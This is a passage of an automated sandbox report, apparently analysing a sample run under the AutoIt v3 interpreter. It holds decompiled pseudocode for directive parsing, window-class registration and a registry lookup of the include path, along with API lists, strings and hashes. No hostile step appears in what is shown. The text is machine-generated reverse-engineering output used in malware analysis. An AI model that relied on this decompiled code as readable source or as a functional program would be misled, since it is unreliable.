												_t88 = CompareStringW(0x400, _t118,  *_a8, _a8[1],  *( *( *((intOrPtr*)(_t145 + 0x1c)) + _t148 * 4)), ( *( *((intOrPtr*)(_t145 + 0x1c)) + _t148 * 4))[1]);
												__eflags = _t88;
												if(_t88 == 0) {
													break;
												}
												__eflags = _t88 + 0xfffffffe;
												if(_t88 + 0xfffffffe == 0) {
													break;
												} else {
													_t148 = _t148 + 1;
													__eflags = _t148 -  *(_t145 + 0x20);
													if(_t148 <  *(_t145 + 0x20)) {
														continue;
													} else {
													}
												}
												goto L3;
											}
											_t89 =  *((intOrPtr*)(_t145 + 0x2c));
											__eflags =  *((intOrPtr*)( *((intOrPtr*)(_t89 + _t148 * 4)))) - _t118;
											if( *((intOrPtr*)( *((intOrPtr*)(_t89 + _t148 * 4)))) > _t118) {
												_push(4);
												goto L2;
											}
										}
									} else {
										_t92 = E013D922B(1, _t124, _t147, _t147, L"#include", 8);
										_t149 = _t149 + 0xc;
										__eflags = _t92;
										if(_t92 == 0) {
											_t119 = _v12;
											__eflags = E0141A25E(_t145, __fp0, _t147 + 0x10, _v12) - 1;
											if(__eflags != 0) {
												_push(_t147);
												_push(L"Cannot parse #include");
												goto L47;
											} else {
												E013BC110( &_v48, __eflags, _t119);
												E013BC110( &_v32, __eflags, _t119);
												_push( *_a12);
												_t101 = E013B7E80(_t145, _t143, __fp0,  &_v32, E013B4F9D(_t145, __eflags,  &_v48),  &_v32, _a8, _t147);
												E013B774C( &_v32);
												E013B774C( &_v48);
												__eflags = _t101;
												if(_t101 == 0) {
													goto L48;
												} else {
													_t118 = 1;
												}
											}
										} else {
											_t104 = E013D922B(1, _t124, _t147, _t147, L"#comments-start", 0xf);
											_t149 = _t149 + 0xc;
											__eflags = _t104;
											if(__eflags == 0) {
												L14:
												_a4 = _t118;
												while(1) {
													_push(_t124);
													_t124 = _a16;
													__eflags = E013B81E9(_t143, __eflags, _t154, _t147);
													if(__eflags == 0) {
														break;
													}
													 *_a12 =  *_a12 + 1;
													E013B7CA2(__eflags, _t147);
													E013B7BB5(_t147);
													_t110 = E013D922B(_t118, _t124, _t147, _t147, L"#comments-start", 0xf);
													_t149 = _t149 + 0xc;
													__eflags = _t110;
													if(__eflags == 0) {
														L22:
														_a4 = _a4 + 1;
														continue;
													} else {
														_t111 = E013D922B(_t118, _t124, _t147, _t147, L"#cs", 3);
														_t149 = _t149 + 0xc;
														__eflags = _t111;
														if(__eflags == 0) {
															goto L22;
														} else {
															_t112 = E013D922B(_t118, _t124, _t147, _t147, L"#comments-end", 0xd);
															_t149 = _t149 + 0xc;
															__eflags = _t112;
															if(_t112 == 0) {
																L20:
																_t114 = _a4 - 1;
																_a4 = _t114;
																__eflags = _t114;
																if(__eflags > 0) {
																	continue;
																}
															} else {
																_t115 = E013D922B(_t118, _t124, _t147, _t147, L"#ce", 3);
																_t149 = _t149 + 0xc;
																__eflags = _t115;
																if(__eflags != 0) {
																	continue;
																} else {
																	goto L20;
																}
															}
														}
													}
													goto L3;
												}
												__eflags = _a4;
												if(__eflags > 0) {
													_push(_t147);
													_push(L"Unterminated group of comments");
													L47:
													_push( *_a12);
													_push(_a8);
													E0141A072(_t145, _t143, __eflags, _t154);
													L48:
													_t118 = 0;
												}
											} else {
												_t116 = E013D922B(1, _t124, _t147, _t147, L"#cs", 3);
												_t149 = _t149 + 0xc;
												__eflags = _t116;
												if(__eflags == 0) {
													goto L14;
												}
											}
										}
									}
								}
							}
						}
					}
				} else {
					_push(3);
					L2:
					_pop(_t118);
				}
				L3:
				_t64 = _v16;
				 *_t64 =  *_t64 - 1;
				if( *_t64 == 0) {
					_push(4);
					E013D01ED(_t64);
					E013D0234(_v12);
				}
				return _t118;
			}

0x013b7cdd
0x013b7cdd
0x013b7ce6
0x013b7ceb
0x013b7ced
0x013b7cf5
0x013b7cf8
0x013b7cfd
0x013b7d02
0x013b7d03
0x013b7d06
0x013b7d07
0x013b7d0d
0x013b7d3e
0x013b7d43
0x013b7d46
0x013b7d48
0x013b7d52
0x013b7d57
0x013b7d5a
0x013b7d5c
0x013f5f38
0x013b7d62
0x013b7d6a
0x013b7d6f
0x013b7d72
0x013b7d74
0x013f5f3f
0x013b7d7a
0x013b7d82
0x013b7d87
0x013b7d8a
0x013b7d8c
0x013f5f50
0x013f5f53
0x013f5f5b
0x013f5f68
0x013f5f6a
0x013f5f71
0x013f5f75
0x013f5f7a
0x013f5f7e
0x013f5fbb
0x013f5fbb
0x013f5fbe
0x00000000
0x013f5fc0
0x013f5fc2
0x013f5fc7
0x013f5fc7
0x013f5fd0
0x00000000
0x013f5fd0
0x013f5f80
0x013f5f80
0x013f5f87
0x013f5f8b
0x00000000
0x013f5f8d
0x013f5f8d
0x013f5f90
0x013f5f94
0x013f5fa9
0x013f5faa
0x013f5fb0
0x013f5fb1
0x00000000
0x013f5f96
0x013f5f96
0x013f5f9a
0x00000000
0x013f5f9c
0x013f5fa4
0x013f5fd3
0x013f5fd6
0x013f5fdb
0x013f5f9a
0x013f5f94
0x013f5f8b
0x013b7d92
0x013b7d9a
0x013b7d9f
0x013b7da2
0x013b7da4
0x013f5fe1
0x013f5fe3
0x013f5fe6
0x013f5fec
0x013f6005
0x013f600b
0x013f600d
0x00000000
0x00000000
0x013f600f
0x013f6012
0x00000000
0x013f6014
0x013f6014
0x013f6015
0x013f6018
0x00000000
0x00000000
0x013f601a
0x013f6018
0x00000000
0x013f6012
0x013f601f
0x013f6025
0x013f6027
0x013f602d
0x00000000
0x013f602d
0x013f6027
0x013b7daa
0x013b7db2
0x013b7db7
0x013b7dba
0x013b7dbc
0x013f6034
0x013f6043
0x013f6045
0x013f6099
0x013f609a
0x00000000
0x013f6047
0x013f604b
0x013f6054
0x013f605c
0x013f6076
0x013f6080
0x013f6088
0x013f608d
0x013f608f
0x00000000
0x013f6091
0x013f6093
0x013f6093
0x013f608f
0x013b7dc2
0x013b7dca
0x013b7dcf
0x013b7dd2
0x013b7dd4
0x013b7dee
0x013b7dee
0x013b7df1
0x013b7df1
0x013b7df2
0x013b7dfb
0x013b7dfd
0x00000000
0x00000000
0x013b7e07
0x013b7e09
0x013b7e0f
0x013b7e1c
0x013b7e21
0x013b7e24
0x013b7e26
0x013b7e78
0x013b7e78
0x00000000
0x013b7e28
0x013b7e30
0x013b7e35
0x013b7e38
0x013b7e3a
0x00000000
0x013b7e3c
0x013b7e44
0x013b7e49
0x013b7e4c
0x013b7e4e
0x013b7e64
0x013b7e67
0x013b7e68
0x013b7e6b
0x013b7e6d
0x00000000
0x013b7e73
0x013b7e50
0x013b7e58
0x013b7e5d
0x013b7e60
0x013b7e62
0x00000000
0x00000000
0x00000000
0x00000000
0x013b7e62
0x013b7e4e
0x013b7e3a
0x00000000
0x013b7e26
0x013f60a4
0x013f60a6
0x013f60ac
0x013f60ad
0x013f60b2
0x013f60b7
0x013f60b9
0x013f60bc
0x013f60c1
0x013f60c1
0x013f60c1
0x013b7dd6
0x013b7dde
0x013b7de3
0x013b7de6
0x013b7de8
0x00000000
0x00000000
0x013b7de8
0x013b7dd4
0x013b7dbc
0x013b7da4
0x013b7d8c
0x013b7d74
0x013b7d5c
0x013b7d0f
0x013b7d0f
0x013b7d11
0x013b7d11
0x013b7d11
0x013b7d12
0x013b7d12
0x013b7d15
0x013b7d18
0x013b7d1a
0x013b7d1d
0x013b7d25
0x013b7d2a
0x013b7d33

Strings

", xrefs: 013F5F6A
#cs, xrefs: 013B7DD8, 013B7E2A
Unterminated group of comments, xrefs: 013F60AD
#notrayicon, xrefs: 013B7D4C
#comments-start, xrefs: 013B7DC4, 013B7E16
#comments-end, xrefs: 013B7E3E
#include, xrefs: 013B7DAC
', xrefs: 013F5F80
Cannot parse #include, xrefs: 013F609A
Bad directive syntax error, xrefs: 013F5FB1
#ce, xrefs: 013B7E52
#OnAutoItStartRegister, xrefs: 013B7D7C
#include-once, xrefs: 013B7D94
#pragma compile, xrefs: 013B7D38
#requireadmin, xrefs: 013B7D64

Memory Dump Source

Source File: 00000008.00000002.229320904.00000000013B1000.00000020.00020000.sdmp, Offset: 013B0000, based on PE: true

Associated: 00000008.00000002.229315655.00000000013B0000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.229499261.000000000144D000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.229548328.0000000001473000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.229563682.000000000147D000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.229576135.0000000001485000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_13b0000_Male.jbxd

Similarity

API ID:
String ID: "$#OnAutoItStartRegister$#ce$#comments-end$#comments-start$#cs$#include$#include-once$#notrayicon$#pragma compile$#requireadmin$'$Bad directive syntax error$Cannot parse #include$Unterminated group of comments
API String ID: 0-1645009161
Opcode ID: 595f39a6949669212f640b7d61a3058341d639efe231cbd38af9cb782d34a6fc
Instruction ID: 79243f3dee78ceef247fbcb50110de7cdc26c0bff72a7725736ca293a84f75b9
Opcode Fuzzy Hash: 595f39a6949669212f640b7d61a3058341d639efe231cbd38af9cb782d34a6fc
Instruction Fuzzy Hash: EC910672B0020ABFDB11AF68DC81FEA3B68EF61248F144059FB059B991FB71DA15C791

Uniqueness

Uniqueness Score: -1.00%

Function 013B35B7, Relevance: 19.3, APIs: 7, Strings: 4, Instructions: 53
windowregistryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 82%

			E013B35B7(intOrPtr _a8, intOrPtr _a12) {
				intOrPtr _v12;
				char _v16;
				struct _WNDCLASSEXW _v64;
				struct HINSTANCE__* _t19;
				int _t29;

				_t19 =  *0x1482348; // 0x13b0000
				 *0x1482924 = _t19;
				_v64.cbSize = 0x30;
				_v64.style = 0x2b;
				_v64.cbClsExtra = 0;
				_v64.cbWndExtra = 0x1e;
				_v64.hInstance = _t19;
				_v64.hCursor = 0;
				_v64.hbrBackground = GetSysColorBrush(0xf);
				_v64.hIconSm = _a12;
				_v64.hIcon = _a8;
				_v64.lpszMenuName = 0;
				_v64.lpszClassName = L"AutoIt v3 GUI";
				_v64.lpfnWndProc = 0x13b21bd;
				 *0x1482384 = RegisterClassExW( &_v64);
				 *0x1482928 = RegisterWindowMessageW(L"TaskbarCreated");
				_v16 = 8;
				_v12 = 0x13b;
				__imp__InitCommonControlsEx( &_v16);
				 *0x148297c = ImageList_Create(0x10, 0x10, 0x21, 1, 1);
				_t29 = ImageList_ReplaceIcon( *0x148297c, 0xffffffff, LoadIconW( *0x1482924, 0xa9)); // executed
				 *0x1482980 = 0;
				return _t29;
			}

0x013b35bd
0x013b35c5
0x013b35cc
0x013b35d3
0x013b35da
0x013b35dd
0x013b35e4
0x013b35e7
0x013b35f0
0x013b35f6
0x013b35fc
0x013b3603
0x013b3606
0x013b360d
0x013b361f
0x013b362b
0x013b3634
0x013b363b
0x013b3642
0x013b3663
0x013b3677
0x013b367d
0x013b3685

APIs

GetSysColorBrush.USER32(0000000F), ref: 013B35EA
RegisterClassExW.USER32 ref: 013B3614
RegisterWindowMessageW.USER32(TaskbarCreated), ref: 013B3625
InitCommonControlsEx.COMCTL32(?), ref: 013B3642
ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 013B3652
LoadIconW.USER32 ref: 013B3668
ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 013B3677

Strings

+, xrefs: 013B35D3
TaskbarCreated, xrefs: 013B361A
AutoIt v3 GUI, xrefs: 013B3606
0, xrefs: 013B35CC

Memory Dump Source

Source File: 00000008.00000002.229320904.00000000013B1000.00000020.00020000.sdmp, Offset: 013B0000, based on PE: true

Associated: 00000008.00000002.229315655.00000000013B0000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.229499261.000000000144D000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.229548328.0000000001473000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.229563682.000000000147D000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.229576135.0000000001485000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_13b0000_Male.jbxd

Similarity

API ID: IconImageList_Register$BrushClassColorCommonControlsCreateInitLoadMessageReplaceWindow
String ID: +$0$AutoIt v3 GUI$TaskbarCreated
API String ID: 2914291525-1005189915
Opcode ID: 7a842dcc9e6a919e7acd21d7f3c035d6a60a97d1a9df7a821cbf28acc77b3ef8
Instruction ID: 9dc805f0bf2138d6eca7e04b026200b8b46263601b256c75a00a796c9c98b83c
Opcode Fuzzy Hash: 7a842dcc9e6a919e7acd21d7f3c035d6a60a97d1a9df7a821cbf28acc77b3ef8
Instruction Fuzzy Hash: 9C21E0B9E01318AFDB20DFE4E888A9DBBF4FB18744F00411AFA21A62A4D7B44544CF94

Uniqueness

Uniqueness Score: -1.00%

Function 013B4E52, Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 201
registryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 97%

			E013B4E52(void* __eflags, void* __fp0, int _a4, char _a8, char _a20, char _a24, char _a32, char* _a36, char _a40, signed int* _a44, short _a48, char _a56) {
				int _v0;
				short _v2;
				void* _v4;
				void* _v8;
				void* __esi;
				void* __ebp;
				long _t64;
				signed int* _t75;
				signed int* _t84;
				short* _t89;
				signed int _t100;
				signed int* _t101;
				signed int _t105;
				signed int _t108;
				signed int _t141;
				char* _t150;
				signed int _t151;
				signed int _t152;

				_t153 = __eflags;
				_t152 = _t151 & 0xfffffff8;
				E013F2370();
				_t108 = 0;
				 *0x14833b4 = _a4;
				 *0x14833b0 = 0;
				 *0x14833b2 = 0;
				 *0x14833b8 = 0;
				 *0x14833bc = 0;
				 *0x14833c0 = 0;
				 *0x14833c4 = 0;
				 *0x14833c8 = 0x144dbf8;
				 *0x14833cc = 0;
				 *0x14833d0 = 0;
				 *0x14833d4 = 0;
				 *0x14833d8 = 0x144db40;
				 *0x14833dc = 0;
				 *0x14833e0 = 0;
				 *0x14833e4 = 0;
				 *0x14833e8 = 0x144dbf8;
				 *0x14833ec = 0;
				 *0x14833f0 = 0;
				 *0x14833f4 = 0;
				 *0x14833fc = 0;
				 *0x1483400 = 0x144db48;
				 *0x1483404 = 0;
				 *0x1483408 = 0;
				 *0x148340c = 0;
				 *0x1483410 = 0x66;
				E013B9091( &_a24, __eflags);
				E013B4FF8( &_a24);
				E013B4B95( &_a24,  &_a24);
				E013B4DCB( &_a24, __fp0, L"\\Include\\");
				E013B5E8E(0x14833e8,  &_a20);
				E013B9091( &_v0, _t153);
				E013B8E3B( &_v0);
				_t148 = 0;
				_t64 = RegOpenKeyExW(0x80000001, L"Software\\AutoIt v3\\AutoIt", 0, 1,  &_v8); // executed
				if(_t64 == 0) {
					__eflags = RegQueryValueExW(_v0, L"Include", 0, 0, 0,  &_a4);
					if(__eflags == 0) {
						_t141 = 2;
						_push( ~(__eflags > 0) | (_a4 + 0x00000001) * _t141);
						E013B3172( &_a40, E013D022B( ~(__eflags > 0) | (_a4 + 0x00000001) * _t141, 0, __eflags));
						_t150 = _a36;
						_t100 = RegQueryValueExW(_v4, L"Include", 0, 0, _t150,  &_v0);
						__eflags = _t100;
						if(_t100 == 0) {
							_t105 = _a4 >> 1;
							__eflags = _t105;
							_a4 = _t105;
							 *((short*)(_t150 + _t105 * 2)) = 0;
							E013BB0DB( &_a8, _t150);
							_t108 = 1;
						}
						_t101 = _a44;
						 *_t101 =  *_t101 - 1;
						__eflags =  *_t101;
						if( *_t101 == 0) {
							_push(4);
							E013D01ED(_t101);
							E013D0234(_t150);
							_t152 = _t152 + 0xc;
						}
						_t148 = 0;
						__eflags = 0;
					}
					RegCloseKey(_v0);
					__eflags = _t108;
					if(_t108 == 0) {
						goto L1;
					} else {
						__eflags = 0;
						_a56 = 0;
						while(1) {
							_v4 =  *((intOrPtr*)(E013B78F9( &_a8, _t148)));
							_v2 = 0;
							_t75 = E013B78F9( &_a4, _t148);
							__eflags =  *_t75;
							if( *_t75 == 0) {
								goto L13;
							}
							_t89 = E013B78F9( &_a8, _t148);
							__eflags =  *_t89 - 0x3b;
							if( *_t89 == 0x3b) {
								goto L13;
							}
							E013D9458( &_a56,  &_v0);
							L17:
							_t148 = _t148 + 1;
							continue;
							L13:
							__eflags = E013D4D83( &_a56);
							if(__eflags != 0) {
								__eflags =  *((short*)(_t152 + 0x46 + E013D4D83( &_a56) * 2)) - 0x5c;
								if(__eflags != 0) {
									E013D9458( &_a56, "\\");
								}
							}
							E013BC110( &_a40, __eflags,  &_a56);
							E013B5E8E(0x14833e8,  &_a36);
							E013B774C( &_a32);
							_a48 = 0;
							_t84 = E013B78F9( &_v0, _t148);
							__eflags =  *_t84;
							if( *_t84 == 0) {
								goto L1;
							} else {
								goto L17;
							}
						}
					}
				}
				L1:
				E013B774C( &_a8);
				E013B774C( &_a24);
				return 0x14833b0;
			}

0x013b4e52
0x013b4e55
0x013b4e5d
0x013b4e6a
0x013b4e6c
0x013b4e77
0x013b4e7f
0x013b4e85
0x013b4e8b
0x013b4e91
0x013b4e97
0x013b4e9d
0x013b4ea2
0x013b4ea8
0x013b4eae
0x013b4eb4
0x013b4ebe
0x013b4ec4
0x013b4eca
0x013b4ed0
0x013b4ed5
0x013b4edb
0x013b4ee1
0x013b4ee7
0x013b4eed
0x013b4ef7
0x013b4efd
0x013b4f03
0x013b4f09
0x013b4f13
0x013b4f1c
0x013b4f27
0x013b4f35
0x013b4f44
0x013b4f4d
0x013b4f56
0x013b4f5f
0x013b4f6f
0x013b4f77
0x013f48da
0x013f48dc
0x013f48e7
0x013f48f1
0x013f48fd
0x013f4902
0x013f4919
0x013f491b
0x013f491d
0x013f4925
0x013f4925
0x013f4927
0x013f492c
0x013f4934
0x013f4939
0x013f4939
0x013f493b
0x013f493f
0x013f493f
0x013f4942
0x013f4944
0x013f4947
0x013f494d
0x013f4952
0x013f4952
0x013f4955
0x013f4955
0x013f4955
0x013f495b
0x013f4961
0x013f4963
0x00000000
0x013f4969
0x013f496b
0x013f496d
0x013f4972
0x013f4984
0x013f498b
0x013f4990
0x013f4995
0x013f4998
0x00000000
0x00000000
0x013f499f
0x013f49a4
0x013f49a8
0x00000000
0x00000000
0x013f49b4
0x013f4a30
0x013f4a30
0x00000000
0x013f49bd
0x013f49c8
0x013f49ca
0x013f49d7
0x013f49dd
0x013f49e9
0x013f49ef
0x013f49dd
0x013f49f9
0x013f4a08
0x013f4a11
0x013f4a1d
0x013f4a22
0x013f4a27
0x013f4a2a
0x00000000
0x00000000
0x00000000
0x00000000
0x013f4a2a
0x013f4972
0x013f4963
0x013b4f7d
0x013b4f81
0x013b4f8a
0x013b4f9a

APIs

Part of subcall function 013B4FF8: GetModuleFileNameW.KERNEL32(00000000,?,00007FFF,?,?,013F4641,?,?,00000100,00000000,00000000,CMDLINE,?,?,00000001,00000000), ref: 013B5016

Part of subcall function 013B4B95: GetFullPathNameW.KERNEL32(?,00007FFF,?,?), ref: 013B4BB7

RegOpenKeyExW.KERNELBASE(80000001,Software\AutoIt v3\AutoIt,00000000,00000001,?,?,\Include\), ref: 013B4F6F
RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,00000000,?), ref: 013F48D8
RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,?,?,00000000), ref: 013F4919
RegCloseKey.ADVAPI32(?), ref: 013F495B
_wcslen.LIBCMT ref: 013F49C2
_wcslen.LIBCMT ref: 013F49D1

Strings

\Include\, xrefs: 013B4F2C
Software\AutoIt v3\AutoIt, xrefs: 013B4F65
Include, xrefs: 013F48CF, 013F4910
\, xrefs: 013F49D7

Memory Dump Source

Source File: 00000008.00000002.229320904.00000000013B1000.00000020.00020000.sdmp, Offset: 013B0000, based on PE: true

Associated: 00000008.00000002.229315655.00000000013B0000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.229499261.000000000144D000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.229548328.0000000001473000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.229563682.000000000147D000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.229576135.0000000001485000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_13b0000_Male.jbxd

Similarity

API ID: NameQueryValue_wcslen$CloseFileFullModuleOpenPath
String ID: Include$Software\AutoIt v3\AutoIt$\$\Include\
API String ID: 98802146-2727554177
Opcode ID: 338b75fcca856d3bcfac8a76fe11ea6a283cbb6f7eea9125b763c70aad770e36
Instruction ID: 59bdf4d2930240165d2b9fddface644dfc219252c9c093c4e9f41f166c04ec4e
Opcode Fuzzy Hash: 338b75fcca856d3bcfac8a76fe11ea6a283cbb6f7eea9125b763c70aad770e36
Instruction Fuzzy Hash: 9771A2715043029EC314EF69E89499FBBE8FFA4A48F40052EF645D72B4EB31D549CB52

Uniqueness

Uniqueness Score: -1.00%

Function 013B3466, Relevance: 17.6, APIs: 7, Strings: 3, Instructions: 63
windowregistryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 100%

			E013B3466() {
				struct _WNDCLASSEXW _v52;
				struct HBRUSH__* _t14;
				struct HICON__* _t15;
				struct HICON__* _t16;
				struct HICON__* _t17;
				void* _t19;
				struct HICON__* _t20;
				void* _t23;
				struct HINSTANCE__* _t25;
				void* _t26;

				_t14 = GetSysColorBrush(0xf);
				_t15 = LoadCursorW(0, 0x7f00);
				_t16 = LoadIconW( *0x1482348, 0x63); // executed
				 *0x14823d0 = _t16; // executed
				_t17 = LoadIconW( *0x1482348, 0xa4); // executed
				 *0x14823d8 = _t17;
				 *0x14823dc = LoadIconW( *0x1482348, 0xa2);
				_t19 = LoadImageW( *0x1482348, 0x63, 1, 0x10, 0x10, 0);
				_t25 =  *0x1482348; // 0x13b0000
				_t26 = _t19;
				_t20 =  *0x14823d0; // 0x10040f
				_v52.hIcon = _t20;
				 *0x14823d4 = _t26;
				_v52.cbSize = 0x30;
				_v52.style = 0x23;
				_v52.cbClsExtra = 0;
				_v52.cbWndExtra = 0;
				_v52.hInstance = _t25;
				_v52.hCursor = _t15;
				_v52.hbrBackground = _t14;
				_v52.lpszMenuName = 0;
				_v52.lpszClassName = L"AutoIt v3";
				_v52.hIconSm = _t26;
				_v52.lpfnWndProc = E013B3BE6;
				 *0x1482344 = RegisterClassExW( &_v52);
				_t23 = E013B35B7(_t25,  *0x14823d0,  *0x14823d4); // executed
				return _t23;
			}

0x013b3471
0x013b3480
0x013b3496
0x013b34a3
0x013b34a8
0x013b34b5
0x013b34be
0x013b34d2
0x013b34d8
0x013b34de
0x013b34e0
0x013b34e5
0x013b34ec
0x013b34f2
0x013b34f9
0x013b3500
0x013b3503
0x013b3506
0x013b3509
0x013b350c
0x013b350f
0x013b3512
0x013b3519
0x013b351c
0x013b352f
0x013b353c
0x013b3545

APIs

GetSysColorBrush.USER32(0000000F), ref: 013B3471
LoadCursorW.USER32(00000000,00007F00), ref: 013B3480
LoadIconW.USER32 ref: 013B3496
LoadIconW.USER32 ref: 013B34A8
LoadIconW.USER32 ref: 013B34BA
LoadImageW.USER32 ref: 013B34D2
RegisterClassExW.USER32 ref: 013B3523

Part of subcall function 013B35B7: GetSysColorBrush.USER32(0000000F), ref: 013B35EA
Part of subcall function 013B35B7: RegisterClassExW.USER32 ref: 013B3614
Part of subcall function 013B35B7: RegisterWindowMessageW.USER32(TaskbarCreated), ref: 013B3625
Part of subcall function 013B35B7: InitCommonControlsEx.COMCTL32(?), ref: 013B3642
Part of subcall function 013B35B7: ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 013B3652
Part of subcall function 013B35B7: LoadIconW.USER32 ref: 013B3668
Part of subcall function 013B35B7: ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 013B3677

Strings

#, xrefs: 013B34F9
0, xrefs: 013B34F2
AutoIt v3, xrefs: 013B3512

Memory Dump Source

Source File: 00000008.00000002.229320904.00000000013B1000.00000020.00020000.sdmp, Offset: 013B0000, based on PE: true

Associated: 00000008.00000002.229315655.00000000013B0000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.229499261.000000000144D000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.229548328.0000000001473000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.229563682.000000000147D000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.229576135.0000000001485000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_13b0000_Male.jbxd

Similarity

API ID: Load$Icon$ImageRegister$BrushClassColorList_$CommonControlsCreateCursorInitMessageReplaceWindow
String ID: #$0$AutoIt v3
API String ID: 423443420-4155596026
Opcode ID: fee99ae35dcb9966137e85831ef55cbb427e5229c3550a479e0d969eee5bbd2d
Instruction ID: ca8a9748f403176b04f9e7b601973783293eefefe90b35434756f3f820baa6a6
Opcode Fuzzy Hash: fee99ae35dcb9966137e85831ef55cbb427e5229c3550a479e0d969eee5bbd2d
Instruction Fuzzy Hash: 0B21E5B4E10318ABDB209FE5E859E9EBFB5FB58B54F00406EE604A62A8D7F15540CF90

Uniqueness

Uniqueness Score: -1.00%

Function 013B7E80, Relevance: 16.3, APIs: 3, Strings: 6, Instructions: 530
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 84%

			E013B7E80(char __ecx, void* __edx, long long __fp0, intOrPtr* _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20) {
				char _v20;
				char _v24;
				char _v36;
				intOrPtr _v40;
				char _v44;
				WCHAR* _v52;
				char _v68;
				char _v72;
				char _v76;
				char _v80;
				char _v92;
				intOrPtr _v96;
				char _v104;
				signed int _v108;
				char _v124;
				signed int _v128;
				signed int _v132;
				intOrPtr _v144;
				char _v148;
				intOrPtr* _v152;
				signed int _v156;
				signed int _v160;
				intOrPtr _v164;
				signed int _v168;
				signed int _v172;
				signed int _v176;
				char _v180;
				char _v184;
				char _v188;
				WCHAR* _v192;
				short _v194;
				char _v196;
				void* _v200;
				char _v204;
				signed int _v208;
				signed int _v212;
				char _v214;
				signed int _v216;
				void* _v217;
				char _v218;
				void* _v220;
				char _v221;
				signed int* _v224;
				char _v225;
				signed int _v228;
				char _v229;
				signed int _v232;
				intOrPtr _v236;
				intOrPtr _v240;
				char _v245;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				intOrPtr _t217;
				intOrPtr _t218;
				void* _t228;
				void* _t229;
				void* _t244;
				void* _t254;
				intOrPtr* _t258;
				signed int* _t263;
				void* _t265;
				signed int _t268;
				signed int _t274;
				signed int _t286;
				signed int _t293;
				signed int _t296;
				signed int _t298;
				signed char* _t318;
				signed int _t321;
				signed int _t322;
				intOrPtr _t328;
				intOrPtr _t330;
				signed int _t331;
				intOrPtr _t337;
				long long* _t354;
				intOrPtr* _t358;
				char _t364;
				signed int _t394;
				signed short _t406;
				signed int _t430;
				intOrPtr* _t446;
				signed int _t455;
				signed int _t456;
				signed int _t457;
				intOrPtr _t462;
				char _t464;
				signed int _t465;
				signed int _t466;

				_t489 = __fp0;
				_t448 = __edx;
				_t217 =  *0x14835c8; // 0x0
				_t218 = _t217 + 1;
				_v220 = __ecx;
				 *0x14835c8 = _t218;
				_t472 = _t218 - 0x30;
				if(_t218 >= 0x30) {
					E0141A072(__ecx, __edx, __eflags, __fp0, _a12, _a20, L"#include depth exceeded.  Make sure there are no recursive includes", _a16);
					_t364 = 0;
					L22:
					 *0x14835c8 =  *0x14835c8 - 1;
					return _t364;
				}
				_t364 = 0;
				_v225 = 1;
				_v214 = 1;
				_push(0x10000);
				_v224 = 0;
				_v212 = 0;
				_v148 = 0;
				_v144 = E013D022B(__ecx, __ecx, _t472);
				E013B62AD(_t222,  &_v148);
				E013B62AD(E013B62AD(E013B9091( &_v124, _t472),  &_v148),  &_v148);
				_t453 = _a4;
				_v108 = 0x8000;
				_t228 = E013B3195( &_v148, _a4, 0x8000); // executed
				if(_t228 == 0) {
					_t229 = E0141A072(__ecx, __edx, __eflags, __fp0, _a12, _a20, L"Error opening the file", _a16);
					L21:
					E013B62AD(_t229,  &_v148);
					E013B62AD(E013B774C( &_v124),  &_v148);
					E013D0234(_v144);
					goto L22;
				}
				E013B2E2B(E013B2FE7( &_v148), 0,  &_v148, __fp0); // executed
				E013B2E14( &_v148, _t448);
				_t474 = _v108 & 0x00000003;
				if((_v108 & 0x00000003) != 0) {
					__eflags = _v108 & 0x00000001;
					if((_v108 & 0x00000001) == 0) {
						L30:
						__eflags = _v104 - 3;
						if(_v104 != 3) {
							__eflags = _v104 - 5;
							if(_v104 != 5) {
								__eflags = _v104 - 7;
								if(__eflags != 0) {
									goto L3;
								}
								_push(2);
								_push(0x1474600);
								L36:
								E0141D455( &_v148);
								goto L3;
							}
							_push(2);
							_push(0x1474604);
							goto L36;
						}
						_push(3);
						_push(0x14745fc);
						goto L36;
					}
					__eflags = _v132 | _v128;
					if(__eflags != 0) {
						goto L3;
					}
					goto L30;
				}
				L3:
				E013B9091( &_v52, _t474);
				E013CFCA9( &_v52);
				E013B9091( &_v68, _t474);
				_t449 =  &_v68;
				E013B50F7(_t453,  &_v68);
				_t461 = _v128;
				_v156 = 0x18;
				E013CFB60(_t474,  &_v92,  &_v156);
				_t244 = E013B2F13( &_v156, _v132, _v128, _t364);
				_t475 = _v96 - 0x21335541;
				if(_v96 == 0x21335541) {
					__eflags = _v72 - 0x36304145;
					if(__eflags != 0) {
						goto L4;
					}
					E013B62AD(_t244,  &_v148);
					_v80 = _t364;
					_v76 = _t364;
					_v72 = _t364;
